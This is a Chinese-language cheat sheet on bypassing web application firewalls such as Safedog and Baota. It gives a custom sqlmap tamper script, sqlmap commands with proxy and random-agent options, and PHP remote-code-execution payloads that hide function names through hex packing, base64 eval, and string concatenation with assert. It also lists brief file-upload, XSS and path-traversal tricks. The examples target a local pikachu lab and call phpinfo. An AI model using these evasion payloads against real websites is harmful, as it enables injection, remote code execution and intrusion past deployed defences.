WAF绕过-漏洞利用之注入上传跨站等绕过
- SQL 注入
- 文件上传
- XSS 跨站
- 其他集合
- hex
- base64
- 变量覆盖、拼接,替换函数
- 文件包含
SQL 注入
如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块
安全狗:参考之前 payload(现在不行了)
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH
def tamper(payload, **kwargs):
retVal = ""
if payload:
payload = payload.replace("union", "%23a%0union")
payload = payload.replace("select", "/*!44534select*/")
payload = payload.replace("%20", "%23a%0a")
payload = payload.replace("", "%23a%0a")
payload = payload.replace("database()","database%23a%0a()")
return payload
sqlmap.py 利用
python sqlmap.py -u "http://192.168.224.130/xscj/pikachu-master/vul/sqli/sqli_str.php?name=1%22&submit=%E6%9F%A5%E8%AF%A2" --random-agent --tamper=ridog.py
Aliyun:基本修改指纹即可
宝塔:匹配关键字外加/*等
sqlmap --proxy=“http://127.0.0.1:8080” --tamper=“waf.py” --random-agent
文件上传
1.php 截断 参考前面上传 waf 绕过 payload
XSS 跨站
利用 XSStrike 绕过 加上–timeout 或–proxy 绕过 cc
其他集合
RCE:
pikachu靶场,宝塔拦截日志
采用base64绕过:
绕过的一种方法:限制Base64,可以用16进制,也可以拼接替换。
加密解密绕过:
hex
PHP pack() 函数
字符串转16进制
<?php
$hex='706870696e666f28293b';
echo(pack("H*",$hex));
?>
base64
<?php
eval(base64_decode('cGhwaW5mbygpOw=='));
?>
变量覆盖、拼接,替换函数
宝塔拦截参数base64_decode()
txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4
如果连assert()也过滤了,变量继续覆盖加拼接
txt=$x='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','','pxhpxinxfo()');$xxx($y);&submit=%E6%8F%90%E4%BA%A4
可以get+post混合使用
文件包含
没什么好说的就这几种
…\ …/ …\等